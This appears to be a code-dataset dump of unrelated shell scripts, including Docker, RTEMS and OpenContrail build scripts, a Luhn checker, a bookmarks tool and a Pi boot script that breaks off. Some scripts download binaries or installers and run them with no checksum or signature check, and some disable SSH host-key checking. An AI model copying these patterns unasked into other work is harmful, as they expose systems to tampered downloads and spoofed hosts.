# The backslash escaped variables below are so bash doesn't immediately
# replace them with their environment variable values before passing to docker
dockerfile=$(
cat <<EOF
# Based on https://github.com/rust-lang-nursery/docker-rust-nightly/blob/master/nightly/Dockerfile
FROM buildpack-deps:stretch
ARG USER
ARG USER_ID=1000
ARG GROUP_ID=1000
RUN addgroup --gid \${GROUP_ID} \${USER}; \
adduser --disabled-password --gid \${GROUP_ID} --uid \${USER_ID} --gecos \${USER} \${USER}
USER ${USER}
WORKDIR /opt
ENV \
PATH=/home/${USER}/.cargo/bin:/opt/target/debug:\${PATH}
RUN set -eux; \
cd; \
wget --quiet "https://static.rust-lang.org/rustup/dist/x86_64-unknown-linux-gnu/rustup-init"; \
chmod +x rustup-init; \
./rustup-init -y --no-modify-path --default-toolchain nightly-2018-09-13; \
rustup component add clippy-preview; \
rm rustup-init; \
rustup component add clippy-preview rustfmt-preview;
EOF
)
# chown -R \${USER}:\${GROUP_ID} /opt/target/registry;
echo "${dockerfile}" | docker build \
--tag "$(basename "${PWD}")" \
--build-arg "USER=${USER}" \
--build-arg "USER_ID=$(id -u)" \
--build-arg "GROUP_ID=$(id -g)" \
-
| true
|
17baf3531694e9de78bc625a4775adb68097fb57
|
Shell
|
Tubbz-alt/rce-gen3-sw-lib
|
/test/hello_workshop/build.sh
|
UTF-8
| 2,193
| 3.015625
| 3
|
[] |
no_license
|
#!/bin/bash
#
# Build the hello world example for RTEMS
#
# To run this, you need to be in the directory where you found this script.
#set -x
#Compile the objects
rtems-gcc hello_so_1.c -I${RTEMS_SDK}/include/core \
-I${RTEMS_SDK}/include/rtems \
-o hello_so_1.o
rtems-gcc hello_so_2.c -I${RTEMS_SDK}/include/core \
-I${RTEMS_SDK}/include/rtems \
-o hello_so_2.o
#Link the .so images
rtems-ld hello_so_1.o -L${RTEMS_SDK}/lib \
-L${RTEMS_SDK}/tgt/rtems \
-l:rtems.so \
-Wl,-soname,examples:hello_1.so \
-o hello_1.so
rtems-ld hello_so_2.o -L${RTEMS_SDK}/lib \
-L${RTEMS_SDK}/tgt/rtems \
-l:rtems.so \
-Wl,-soname,examples:hello_2.so \
-o hello_2.so
#Compile the .exe object
rtems-gcc hello_task.c -I${RTEMS_SDK}/include/core \
-I${RTEMS_SDK}/include/rtems \
-o hello_task.o
#Compile the .svt object
rtems-gcc hello_svt.c -I${RTEMS_SDK}/include/core \
-o hello_svt.o
#Link the .svt image
rtems-svt hello_svt.o -L${RTEMS_SDK}/lib \
-l:rtems.so \
-Wl,-soname,examples:hello.svt \
-o hello.svt
#Link the .exe images
rtems-task hello_task.o -L${RTEMS_SDK}/lib \
-l:rtems.so -l:hello_1.so \
-Wl,-soname,examples:hello_1.exe \
-o hello_1.exe
rtems-task hello_task.o -L${RTEMS_SDK}/lib \
-l:rtems.so -l:hello_2.so \
-Wl,-soname,examples:hello_2.exe \
-o hello_2.exe
[ ! -e ../compiled ] && mkdir ../compiled
cp *.o *.so *.svt *.exe ../compiled
rm *.o *.so *.svt *.exe
| true
|
f56831c9de375df69d25c9176dea2f1bb473ceba
|
Shell
|
projectlegionos/aosp-buildernew
|
/upload_ccache
|
UTF-8
| 500
| 2.953125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Compress the ccache directory with pigz and upload it to Google Drive
# (via rclone) into a gapps- or vanilla-specific folder.
cd /tmp

# com <dir> <level>: tar <dir> into <dir>.tar.gz at the given pigz level.
# Compress function with pigz for faster compression
com ()
{
    tar --use-compress-program="pigz -k -$2 " -cf "$1".tar.gz "$1"
}
time com ccache 1 # Compression level 1, its enough

# Bug fix: quote $with_gapps — when the variable is unset the original
# test expanded to "[ == true ]", a '[' syntax error.
if [ "$with_gapps" == "true" ]; then # This is me testing out whether ccache's of vanilla and gapps build vary in build time...May remove this check in future
    time rclone copy ccache.tar.gz drive:ccache/legion-gapps -P
else
    time rclone copy ccache.tar.gz drive:ccache/legion-vanilla -P
fi
| true
|
4d5305169443ae8ff1d8954df8ac2383b63475cf
|
Shell
|
Simas1/exercism-exercises
|
/bash/luhn/luhn.sh
|
UTF-8
| 959
| 3.78125
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Luhn checksum validator: prints "true" if the digit string given in
# the arguments passes the check, "false" otherwise.

input=$*
input=${input//[[:blank:]]/}

# Anything that is not at least two digits is invalid.
if ! [[ "$input" =~ ^[0-9]{2,}$ ]]; then
  echo 'false'
  exit 0
fi

num=${input// /}

declare -a arr=()
# Double digits at odd positions counted from the LEFT.
# NOTE(review): canonical Luhn doubles every second digit from the
# RIGHT; left-based doubling only agrees for even-length inputs —
# confirm against the exercise's test cases.
for ((i=0; i<${#num}; i++)); do
  if [ $(((i+1)%2)) -ne 0 ]; then
    dup=$((${num:$i:1}*2))
    [ $dup -gt 9 ] && dup=$((dup-9))
    arr+=($dup)
  else
    arr+=(${num:$i:1})
  fi
done

sum=0
for n in ${arr[@]}; do
  sum=$((sum+n))
done

# Bug fix: removed the stray debug "echo $sum" — the contract is to
# print only "true" or "false".
if [ $((sum%10)) -eq 0 ] && [ $sum -ne 0 ]; then
  echo 'true'
else
  echo 'false'
fi

# #!/usr/bin/env bash
# num=$(echo $1 | tr -d " " | sed -e 's/0//')
# [[ $num =~ ^[0-9\s]+$ ]] || { echo false ; exit 0; }
# ! [ ${#num} -lt 2 ] || { echo false ; exit 0 ; }
# counter=0
# total=0
# for x in $(echo $num | grep -o .); do
#     ((x * 2 >= 10)) && y=$((x * 2 - 9)) || y=$((x * 2))
#     ((counter % 2 == 0)) && ((total += $y)) || ((total += $x))
#     ((counter++))
# done
# ((total % 10 == 0)) && echo true || echo false
| true
|
8e95da502705a0a89e43a38000203a6d78dfdd99
|
Shell
|
limkokholefork/bash-cheat
|
/bin/find-scripts.BUG
|
UTF-8
| 875
| 4.1875
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
#------------------------------------------------------------
#
#   Ciro D. Santilli
#
#   finds scripts based on extension and shebangs
#   and returns their paths null separated
#
#   shebangs can be either of type #!/bin/XXX or #!/bin/env/
#
#   currently supported script types types:
#
#   bash    : 'sh', 'bash'
#   python  : 'py'
#
#------------------------------------------------------------

set -u # error on undefined variable
set -e # stop execution if one command goes wrong

usage()
{
  echo 'Usage: '
}

# fixed nargs checking
if [ $# -ne 1 ]
then
  usage
  exit 1
else
  EXT="$1"
  # Bug fix: '[' has no '&&' operator (the original line was a runtime
  # error), and the intent is clearly OR — one variable can never equal
  # both "sh" and "bash" at once.
  if [ "$EXT" = "sh" ] || [ "$EXT" = "bash" ]
  then
    RESULT="$(find . -name "*.sh" -o -name "*.bash" -print0)"
    # NOTE(review): shell variables cannot hold NUL bytes, so the
    # null-separation promised above is lost here — confirm intent.
    RESULT="${RESULT}\0$( find-first-line )"
  else # other scripts, no shebang support
    find-bash-scripts | xargs -0 git add
  fi
  # Quote so the result list is not re-split and re-globbed by echo.
  echo "$RESULT"
  exit 0
fi
| true
|
c9a11197488cd421e62521cf5516992361c37bc5
|
Shell
|
joshnykamp/opscenter6
|
/scripts/teardown_docker_cluster.sh
|
UTF-8
| 531
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/sh
# Tear down a docker cluster created by start_docker_cluster.sh:
# removes the opscenter container plus node1..nodeN.
NUM_NODES=$1

if [ -z "$NUM_NODES" ]; then
  echo "usage teardown_docker_cluster.sh NumNodes"
  echo "   NumNodes  the number of nodes started when using start_docker_cluster.sh"
  exit 1
fi

echo "Stop opscenter (if available)"
docker stop opscenter > /dev/null 2>&1
echo "Remove opscenter (if available)"
docker rm opscenter > /dev/null 2>&1

# Bug fix: 'let' is a bashism and fails under /bin/sh (dash); use
# POSIX arithmetic instead. Same range as before: 1..NUM_NODES.
n=1
while [ "$n" -le "$NUM_NODES" ]; do
  echo "Stop node${n}"
  docker stop "node${n}"
  echo "Remove node${n}"
  docker rm "node${n}"
  n=$((n+1))
done
| true
|
8c4d750141bfd07b6f1ffb422cefe8bf8f01967a
|
Shell
|
michalstruna/exoplanets-ai
|
/scripts/dev.sh
|
UTF-8
| 317
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
# Launch the selected dev services, each in its own terminal window.
# argparser.sh sets $server, $web and $client (1 = requested).
# Run from this script's own directory so relative helper paths resolve.
cd "$(dirname "${BASH_SOURCE[0]}")"
. ./argparser.sh
if [ $server -eq 1 ]; then
# Database first, then the API dev server.
x-terminal-emulator -e mongod
x-terminal-emulator -e ./server-dev.sh
fi
if [ $web -eq 1 ]; then
x-terminal-emulator -e ./web-dev.sh
fi
if [ $client -eq 1 ]; then
x-terminal-emulator -e ./client-dev.sh
fi
| true
|
96fd0ab5d7201f6df34508ac2b62972049eb950b
|
Shell
|
Juniper/tf-os-k8s-vagrant
|
/scripts/aio-ansible-os-k8s.sh
|
UTF-8
| 1,399
| 2.609375
| 3
|
[] |
no_license
|
#!/bin/bash -v
sudo yum install -y git ansible-2.4.2.0 pciutils wget tcpdump net-tools
# Download Contrail-Ansible-Deployer code For GA R5.0 use 1st command
sudo git clone -b R5.0 https://github.com/Juniper/contrail-ansible-deployer /opt/contrail-ansible-deployer
# sudo git clone https://github.com/Juniper/contrail-ansible-deployer.git /opt/contrail-ansible-deployer
export BASE_DIR=/opt
export OC_PATH=${BASE_DIR}/contrail-ansible-deployer
cd ${BASE_DIR}
rm -rf ${OC_PATH}/config/instances.yaml
cp /home/vagrant/instances.yaml ${OC_PATH}/config/
cd ${OC_PATH}
sudo ansible-playbook -i inventory/ playbooks/configure_instances.yml
sudo ansible-playbook -i inventory/ -e orchestrator=openstack playbooks/install_contrail.yml
# Install Weave Scope for Conatiners monitoring
sudo curl -L git.io/scope -o /usr/bin/scope
sudo chmod a+x /usr/bin/scope
scope launch
echo ******** Clusterbinding for K8s Dashboard ******************
kubectl replace -f https://raw.githubusercontent.com/Juniper/contrail-helm-deployer/master/rbac/cluster-admin.yaml
# If vRouter Agent did not start due to following error "ksync_memory.cc:107: void KSyncMemory::Mmap(bool): Assertion `0' failed" use following command to clean
free -h
echo 3 > /proc/sys/vm/drop_caches
free -h
# Other vrouter commands
#lsmod | grep vrouter
#modprobe vrouter
#cd /etc/contrail/vrouter
#docker-compose down
#docker-compose up -d
| true
|
0eebd6da2e4393cbd3d9723002d124b0c3769bc1
|
Shell
|
ConYel/spar_pipeline
|
/scripts/create_bedgraph_track.sh
|
UTF-8
| 431
| 3.140625
| 3
|
[
"MIT"
] |
permissive
|
set -e
#source `dirname $0`/../config.sh
# Convert a bedGraph track to bigWig.
# Requires $BGTOBIGWIG to point at the bedGraphToBigWig binary —
# presumably exported by the commented-out config.sh above (confirm).
if [ $# -lt 3 ]
then
  # Bug fix: the usage string was missing the closing '>' on <out.bigWig>.
  echo "USAGE: `basename $0` <input.bedgraph> <chrom.sizes> <out.bigWig>"
  exit 1
fi

#chromInfo=`dirname $0`/../annot/chromInfo.txt
INBG=$1 # input bedgraph
chromInfo=$2
OUTBIGWIG=$3 #"${INBG%.*}.bigWig" # output bedgraph

# Only convert when the input exists and is non-empty (-s covers both).
#if [ -f "${INBG}" ] && [ -s "${INBG}" ]; then
if [ -s "${INBG}" ]; then
  # Quote all arguments so paths with spaces survive.
  "${BGTOBIGWIG}" "${INBG}" "${chromInfo}" "${OUTBIGWIG}"
fi
#bedGraphToBigWig
| true
|
86d5e28d79386c3a3a1d28d6878619517a2818e1
|
Shell
|
cligraphy/cligraphy
|
/staging/setup/setup
|
UTF-8
| 787
| 3.734375
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
#
if test "$1" = "-h" -o "$1" = "--help" -o "$1" = "help"; then
echo "setup [fragment...]: sets up environment for the oc tool suite"
exit 0
elif test -z "$1"; then
PARTS=(
base
python
homebrew
apt
yum
pkg
)
else
declare -a PARTS=("$@")
fi
function failed {
echo FAILED
exit 1
}
if test -z "$CLIGRAPHY_REPO_PATH"; then
echo "CLIGRAPHY_REPO_PATH environmental variable not set"
failed
fi
source "${CLIGRAPHY_REPO_PATH}/setup/lib_setup.sh"
oc_setup_init
oc_no_root
export CLIGRAPHY_LOG
for ((i = 0; i < ${#PARTS[@]}; i++)); do
PART=${PARTS[$i]}
/bin/echo -n "Running ${PART} ... "
oc_run ${CLIGRAPHY_REPO_PATH}/setup/${PARTS[$i]}/run && echo OK || failed ${PART}
done
| true
|
80f670ca3914ec0bcf888c18ceede15b598ce671
|
Shell
|
kfaustino/dotfiles
|
/zsh/prompt.zsh
|
UTF-8
| 1,194
| 3.546875
| 4
|
[
"MIT"
] |
permissive
|
autoload colors && colors
if (( $+commands[git] ))
then
git="$commands[git]"
else
git="/usr/bin/git"
fi
git_branch() {
echo $($git symbolic-ref HEAD 2>/dev/null | awk -F/ {'print $NF'})
}
git_dirty() {
st=$($git status --porcelain 2>/dev/null | tail -n 1)
if [[ "$st" == "" ]]
then
st=$($git status 2>/dev/null | tail -n 1)
if [[ "$st" =~ ^nothing ]]
then
echo "on %{$fg_bold[green]%}$(git_branch)%{$reset_color%}"
else
echo ""
fi
else
echo "on %{$fg_bold[red]%}$(git_branch)%{$reset_color%}"
fi
}
unpushed () {
$git cherry -v @{upstream} 2>/dev/null
}
need_push () {
if [[ $(unpushed) == "" ]]
then
echo " "
else
echo " with %{$fg_bold[magenta]%}unpushed%{$reset_color%} "
fi
}
ruby_version() {
echo "$(rbenv version | awk '{print $1}')"
}
rb_prompt() {
if ! [[ -z "$(ruby_version)" ]]
then
echo "%{$fg_bold[yellow]%}$(ruby_version)%{$reset_color%} "
else
echo ""
fi
}
directory_name() {
echo "%{$fg_bold[cyan]%}%1/%\/%{$reset_color%}"
}
export PROMPT=$'\n$(rb_prompt)in $(directory_name) $(git_dirty)$(need_push)\n› '
set_prompt () {
export RPROMPT="%{$fg_bold[cyan]%}%{$reset_color%}"
}
| true
|
413ed5d546467a7b2a63337d449486f8ea230676
|
Shell
|
kitada4010/sbc
|
/shell/sed-filename.sh
|
UTF-8
| 215
| 3.171875
| 3
|
[] |
no_license
|
#!/bin/bash
# Rename every file named "$1" under the current directory to "$2",
# by rewriting the matching part of each found path with sed.
# Usage: sed-filename.sh <oldname> <newname>

# Walk one depth level at a time (original structure kept).
for i in $(seq $(find . -type d | wc -l))
do
    find . -maxdepth "$i" -name "$1" | \
        while IFS= read -r line
        do
            # Bug fix: the original pattern s/'$1'/'$2'/g included literal
            # single quotes that never occur in a path, so nothing was ever
            # replaced and mv tried to move each file onto itself.
            newline=$(echo "$line" | sed "s/$1/$2/g")
            echo "$newline"
            # Quote the target too: unquoted $newline broke on spaces.
            mv "$line" "$newline"
        done
done
| true
|
09f5a050a794498829c62396cadd73af4f816b75
|
Shell
|
smxlong/minespray
|
/install-docker.sh
|
UTF-8
| 268
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
# Push and run the docker install script on every Linode tagged "k8s".
# Requires linode-cli and jq locally, plus the "hufr" SSH private key.
for NODE_IP in $(linode-cli linodes list --tags k8s --json | jq -r '.[].ipv4[0]'); do
# Copy the installer, then execute it remotely; host-key checking is
# disabled because the nodes are freshly provisioned.
scp -o StrictHostKeychecking=no -i hufr install-docker-script.sh $NODE_IP:/root
ssh -o StrictHostKeychecking=no -i hufr $NODE_IP /root/install-docker-script.sh
done
| true
|
b82da4394e922fa7da62e35889ad70ee3a162233
|
Shell
|
umanathlanka/edgeapps
|
/network-functions/sdewan_cnf/e2e-scenarios/three-single-node-clusters/edge1/start_cnf.sh
|
UTF-8
| 1,075
| 2.921875
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# SPDX-License-Identifier: Apache-2.0
# Copyright (c) 2020 Intel Corporation
# start sdewan cnf with 2 provider networks.
PNET_IFC=net2
PNET_IP=$EDGE1_CNF_NET1_IFIP
PNET_NAME=pnetwork1
ONET_IFC=net3
ONET_IP=$EDGE1_CNF_NET3_IFIP
ONET_NAME=pnetwork2
SDEWAN_VALUES_FILE=./edgeapps/network-functions/sdewan_cnf/chart/sdewan-cnf/values.yaml
sed -i -e 's/\(.*registry:\).*/\1 ""/' $SDEWAN_VALUES_FILE
# provider network seting
sed -i -e ":a;N;\$!ba; s/\(interface: \)\"\"/\1$PNET_IFC/1" $SDEWAN_VALUES_FILE
sed -i -e ":a;N;\$!ba; s/\(ipAddress: \)\"\"/\1$PNET_IP/1" $SDEWAN_VALUES_FILE
sed -i -e ":a;N;\$!ba; s/\(name: \)\"\"/\1$PNET_NAME/1" $SDEWAN_VALUES_FILE
# ovn network seting
sed -i -e ":a;N;\$!ba; s/\(interface: \)/\1$ONET_IFC/2" $SDEWAN_VALUES_FILE
sed -i -e ":a;N;\$!ba; s/\(ipAddress: \)/\1$ONET_IP/2" $SDEWAN_VALUES_FILE
sed -i -e ":a;N;\$!ba; s/\(name: \)/\1$ONET_NAME/3" $SDEWAN_VALUES_FILE
sed -i -e 's/\([^ ]\)""/\1/' $SDEWAN_VALUES_FILE
cd edgeapps/network-functions/sdewan_cnf || return
helm install sdewan-cnf chart/sdewan-cnf/
cd - || return
| true
|
e27004f4a96657a39d3a042e305249740eece51e
|
Shell
|
basilmusa/java2bash
|
/src/main/java/java2bash/java2bash/core/BashScript.bash
|
UTF-8
| 403
| 2.90625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# Template expanded by java2bash into a runnable script: {{...}}
# placeholders are filled in and {% if %} blocks are conditional
# (Jinja/Pebble-style syntax — handled by the generator, not bash).
set -euo pipefail
########## COMMON INCLUDES #################################################
{{uniqueCode}}
########## CODE ############################################################
{{code}}
{% if cleanupCode is not empty %}
########## CLEANUP CODE ####################################################
# Registered on EXIT so cleanup runs on both success and failure.
function finish_cleanup {
{{cleanupCode}}
}
trap finish_cleanup EXIT
{% endif %}
| true
|
74e0a2705fdd8d10dd296400d58f08a9084d64e0
|
Shell
|
andavb/Bash-calculator
|
/generirajMatriko.sh
|
UTF-8
| 2,805
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
#pravilen vnos mora biti tako da vpisemo stevila v matriko [ 1 2 3 4 , 5 6 7 8 ] vedno locimo s presledki
#./generirajMatriko.sh [ 1.23 2.45 3.4 5.3 , 1.3 1.4 2.72 4.56 ] [ 1 2 3 4 , 5 6 7 8 ]
#./generirajMatriko.sh [ 1.23 2.45 3.4 5.3 , 1.3 1.4 2.72 4.56 ] [ 12 32 43.2 -12.3 , 2 33.2 1.56 -12.452 ]
#./generirajMatriko.sh [ 1.23 2.45 3.4 , 1.3 1.4 2.72 ] [ 12 32 43.2 , 2 33.2 1.2 , 1 2 3 ]
#./generirajMatriko.sh [ 1 2 3 4 , 5 6 7 8 , 9 10 11 12 , 13 14 15 16 ] [ 1 1 -1 -2 , 5 -5 7 8 , -8 10 -11 12 , 13 14 -14 16 ]
#./generirajMatriko.sh [ 2 , 2 ] [ 2 2 ]
#vejica pomeni nova vrstica matrike.
stevec1=0
stevec2=0
if [ -f "matrika1.dat" ]
then
rm "matrika1.dat"
fi
if [ -f "matrika2.dat" ]
then
rm "matrika2.dat"
fi
if [ $1 != "[" ] #ce ne zacnemo vnasati pravilno
then
echo "Napacen vnos!"
else
shift
for var in "$@" #preberemo vse znake in ko pridemo do prvega ] vemo da smo prebrali celotno 1 matriko
do
if [ $var == "]" ]
then
shift
break
fi
if [ $var == "," ] #ce je vejica skoci v novo vrstico
then
shift
echo >> matrika1.dat
#doda novo vrstico
else
printf "%0.2f" $var >> matrika1.dat
stevec1=$[$stevec1+1]
#zapise vrednost v datoteko
printf " " >> matrika1.dat
#vrednosti locimo s presledki
shift
fi
done
echo >> matrika1.dat
stolpci1=$(head -n 1 matrika1.dat | wc -w)
vrstice1=$(cat matrika1.dat | wc -l)
skupaj=$(($stolpci1 * $vrstice1)) #dobimo koliko je vrednosti v matriki1
if [ $skupaj -ne $stevec1 ] #st vrednosti v matriki1 se mora ujemati s stevcom, ki steje kolikokrat smo zapisali vrednost v mariko
then
echo "Vrtice in stolpci prve matrike se ne ujemajo!"
rm matrika1.dat #zbirsemo datoteko in zakljucimo izvajanje
exit 1
fi
stevec1=0
stolpci1=0
vrstice1=0
shift
for var in "$@" #preberemo vse znake in ko pridemo do prvega ] vemo da smo prebrali celotno 2 matriko
do
if [ $var == "]" ]
then
break
fi
if [ $var == "," ]
then
echo >> matrika2.dat
#doda novo vrstico
elif [ $var == "]" ]
then
echo
elif [ $var != "]" ]
then
printf "%0.2f" $var >> matrika2.dat
stevec1=$[$stevec1+1]
#zapise vrednost v datoteko
printf " " >> matrika2.dat
#vrednosti locimo s presledki
fi
done
echo >> matrika2.dat
stolpci1=$(head -n 1 matrika2.dat | wc -w)
vrstice1=$(cat matrika2.dat | wc -l)
skupaj=$(($stolpci1 * $vrstice1)) #dobimo koliko je vrednosti v matriki2
if [ $skupaj -ne $stevec1 ] #st vrednosti v matriki2 se mora ujemati s stevcom, ki steje kolikokrat smo zapisali vrednost v mariko
then
echo "Vrtice in stolpci druge matrike se ne ujemajo!"
rm matrika1.dat
rm matrika2.dat #zbirsemo obe datoteki in zakljucimo izvajanje
exit 1
fi
fi
| true
|
0c575cb8cf062e6de0ad1ccff7914c835882ef2f
|
Shell
|
simonjohngreen/dc-open-contrail-buildandtest
|
/scripts/build2.sh
|
UTF-8
| 2,245
| 3.0625
| 3
|
[] |
no_license
|
echo Executing build2.sh
echo cloning the opencontrail git repo and building the products
# we need the keypairs file for the git user and login so test for it
if [ ! -f /home/vagrant/keypairs ]; then
echo "Keypairs file is missing but required by build2.sh!"
exit 1
fi
# extract variables from the keypairs file
source /home/vagrant/keypairs
# contrail build directory
#su - vagrant -c 'mkdir -p /home/vagrant/contrail'
## create new ssh key (no passphrase)
#su - vagrant -c 'ssh-keygen -f .ssh/id_rsa -P ""'
#eval `ssh-agent`
#ssh-add
##add the git repo
su - vagrant -c 'git config --global user.name $gituser'
su - vagrant -c 'git config --global user.email $gitemail'
cd /home/vagrant/contrail
su - vagrant -c 'cd /home/vagrant/contrail; ssh -o "StrictHostKeyChecking no" git@github.com'
su - vagrant -c 'cd /home/vagrant/contrail; git config --global color.ui true'
su - vagrant -c 'cd /home/vagrant/contrail; repo init -u git@github.com:Juniper/contrail-vnc'
su - vagrant -c 'cd /home/vagrant/contrail; repo sync'
sudo python /home/vagrant/contrail/third_party/fetch_packages.py
sudo python /home/vagrant/contrail/contrail-webui-third-party/fetch_packages.py
echo "# removing DPDK from the build as its not working yet"
#su - vagrant -c 'cp /home/vagrant/contrail/packages.make /home/vagrant/original-packages.make'
#su - vagrant -c "sed 's/contrail-heat \\\\/contrail-heat/' < /home/vagrant/contrail/packages.make | sed '/\\\$(CONTRAIL_VROUTER_DPDK)/d' > /home/vagrant/contrail/temp.make"
#su - vagrant -c 'cd /home/vagrant/contrail; cp -f /home/vagrant/contrail/temp.make /home/vagrant/contrail/packages.make'
su - vagrant -c 'cp /home/vagrant/contrail/packages.make /home/vagrant/original-packages.make'
su - vagrant -c "sed '/DPDK vRouter/,+6 d' < /home/vagrant/contrail/packages.make > /home/vagrant/contrail/temp.make"
su - vagrant -c 'cd /home/vagrant/contrail; cp -f /home/vagrant/contrail/temp.make /home/vagrant/contrail/packages.make'
echo making the opencontrail packages this may take a while
#make the packages, takes a while
#sudo make -f /home/vagrant/contrail/packages.make $makeopts 2>&1 | tee /home/vagrant/contrail/build.log
cd /home/vagrant/contrail
make -f /home/vagrant/contrail/packages.make $makeopts
| true
|
b941091214c2deb6c53438a58e41b7eac7029629
|
Shell
|
maxproft/thesis
|
/cgle/bulkcgle
|
UTF-8
| 420
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
# Set up a CGLE run folder, then launch one bulk_run.py worker per CPU
# core in the background.
# NOTE(review): the workers are never wait-ed on here — presumably the
# caller monitors them; confirm.
echo -e "\nMaking Subfolder and Data for CPUs"
subfolder='folder'
python bulk_setup.py $subfolder
echo -e "\n "
#Total number of cpus (Linux /proc first, BSD/macOS sysctl fallback)
cpucores=$(grep -c ^processor /proc/cpuinfo 2>/dev/null || sysctl -n hw.ncpu)
#1 fewer than the number of cpus
CPUsMinus="$(($cpucores-1))"
# One worker per cpu id 0..N-1, each backgrounded.
for cpuid in $(seq 0 $CPUsMinus)
#The default python version is used
do python bulk_run.py $subfolder $cpuid &
done
| true
|
223ac33025436672fdecffccc4fc600efc9dc458
|
Shell
|
krebs/painload
|
/retiolum/scripts/adv_graphgen/scripts/all-the-graphs
|
UTF-8
| 603
| 3
| 3
|
[
"WTFPL"
] |
permissive
|
#!/bin/bash
# Generate retiolum network graphs: an anonymized set for the external
# web root and a complete set for the internal one; with a GeoIP
# database configured, also build the map page and marker data.
EXTERNAL_FOLDER=${EXTERNAL_FOLDER:-/var/www/euer.krebsco.de/graphs/retiolum}
INTERNAL_FOLDER=${INTERNAL_FOLDER:-/var/www/euer/graphs/retiolum}
export GEODB="${GEODB:-}"
export TINC_HOSTPATH=${TINC_HOSTPATH:-~/painload/retiolum/hosts}

mapfile="$INTERNAL_FOLDER/map.html"

if test -n "$GEODB";then
  if test ! -e "$mapfile";then
    # Bug fix: the message referenced the undefined $map; report the
    # real destination file instead.
    echo "copying map to $mapfile"
    copy-map "$mapfile"
  fi
  echo "creating geodata database"
  tinc-stats2json | add-geodata > "$INTERNAL_FOLDER/marker.json"
fi

build-graphs anonymous "$EXTERNAL_FOLDER"
build-graphs complete "$INTERNAL_FOLDER"
| true
|
59e3d0248e4f46872da460275ed7febaec95d723
|
Shell
|
tro3373/dotfiles
|
/bin/vb
|
UTF-8
| 118
| 2.640625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Wrapper: run the dotfiles "v" helper from inside the dot bin
# directory, forwarding all arguments.
readonly DOT_BIN=${DOTPATH:-$HOME/.dot}/bin

main() {
    # Quote the path (HOME may contain spaces) and fail loudly instead
    # of running v from the wrong working directory.
    cd "$DOT_BIN" || exit 1
    "$DOT_BIN"/v "$@"
}
main "$@"
| true
|
857c189c49c486e8725546aad6ec9a1ff71d1965
|
Shell
|
toniz4/bookmarksman
|
/bookmarksman
|
UTF-8
| 2,266
| 3.890625
| 4
|
[
"0BSD"
] |
permissive
|
#!/bin/sh
# See LICENSE for license details.
VERSION="0.1"
bookdir="${XDG_DATA_HOME:-$HOME/.local/share}/bookmarks"
bookmarks="$bookdir/bookmarks.json"
tmpbookmarks="$(mktemp)"
die () {
exit 1
}
openbookmark () {
selectsection="$(jq -r 'keys[]' "$bookmarks"\
| dmenu -w "$winid" -p "Open witch section?")" || die
selecttitle="$(jq -r ".$selectsection | keys[]" "$bookmarks" |\
dmenu -w "$winid" -p "Select bookmark")" || die
link="$(jq -r ".${selectsection}.\"${selecttitle}\"" "$bookmarks")"
[ -n "$link" ] && echo "$link"
}
deletebookmark() {
selectsection="$(jq -r 'keys[]' "$bookmarks"\
| dmenu -w "$winid" -p "Open witch section?")" || die
selecttitle="$(jq -r ".$selectsection | keys[]" "$bookmarks" |\
dmenu -w "$winid" -p "Select bookmark to delete")" || die
delete=$(printf "Yes\\nNo" | \
dmenu -w "$winid" -i -p "Are you sure you want to delete $selecttitle?")
case "$delete" in
Yes) jq "del(.$selectsection.\"$selecttitle\")" "$tmpbookmarks" > "$bookmarks";;
*) die;;
esac
rm "$tmpbookmarks"
}
substitutebookmark() {
substitute=$(printf "Yes\\nNo" | \
dmenu -w "$winid" -i -p "There is a bookmark with that name, substitute it?")
case "$substitute" in
Yes) jq "del(.$section.\"$title\")" "$tmpbookmarks" > "$bookmarks";;
*) die;;
esac
}
newbookmark() {
title="$(printf "" | dmenu -w "$winid" -p "Save bookmas as:")" || die
title="$(printf "$title" | sed 's/"//g')"
section="$(jq -r 'keys[]' "$bookmarks" | dmenu -w "$winid" -p "Witch section?")" || die
cp -r "$bookmarks" "$tmpbookmarks"
bookmarkexist="$(jq -r ".${section}.${title}" "$bookmarks")"
[ "$bookmarkexist" = "null" ] || [ -z "$bookmarkexist" ]\
|| substitutebookmark "$section" "$title"
jq "."$section" += {\"$title\": \"$url\"}" "$tmpbookmarks" > "$bookmarks"
rm "$tmpbookmarks"
}
initbookmarks() {
[ -d "$bookdir" ] || mkdir -p "$bookdir"
printf "{\n}\n" > "$bookmarks"
}
help() {
cat <<EOF
usage: bookmarksman [-v] [open] [del] [add [URL]] [XID]
EOF
die
}
[ -e "$bookmarks" ] || initbookmarks
case "$1" in
open)
winid="${2:-0x0}"
openbookmark
;;
add)
url="$2"
winid="${3:-0x0}"
newbookmark
;;
del)
winid="${2:-0x0}"
deletebookmark
;;
-v)
echo "$VERSION"
exit
;;
*) help
;;
esac
| true
|
6d1c4d59fce699bee523b100188ecff5b1e80fd6
|
Shell
|
PrairieOps/mtf-image-edit
|
/boot/onboot.sh
|
UTF-8
| 2,913
| 3.59375
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
read -r -d '' \
MTFAUTOSSHSVC <<- EOF
[Unit]
Description=SSH tunnel to mtf_ssh host
After=network.target
[Service]
User=pi
ExecStart=/bin/bash /opt/mtf/bin/autossh.sh
RestartSec=5
Restart=always
[Install]
WantedBy=multi-user.target
EOF
if [ -d /boot/mtf ]
then
# Get MAC address
mac=$(ip -br link show dev wlan0 | tr -s ' ' | cut -d ' ' -f 3)
# Set hostname based on mac
hostname="lib-mtf-$(printf %s "${mac}" | cut -d ':' -f 4,5,6 --output-delimiter=)"
read -r -d '' \
HOSTS <<- EOF
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
127.0.1.1 ${hostname}
EOF
echo "$HOSTS"| tee "/etc/hosts" >/dev/null
echo "$hostname"| tee "/etc/hostname" >/dev/null
hostname "${hostname}"
if [ -f /boot/mtf/id_rsa.pub ] && [ -f /boot/mtf/id_rsa ]
then
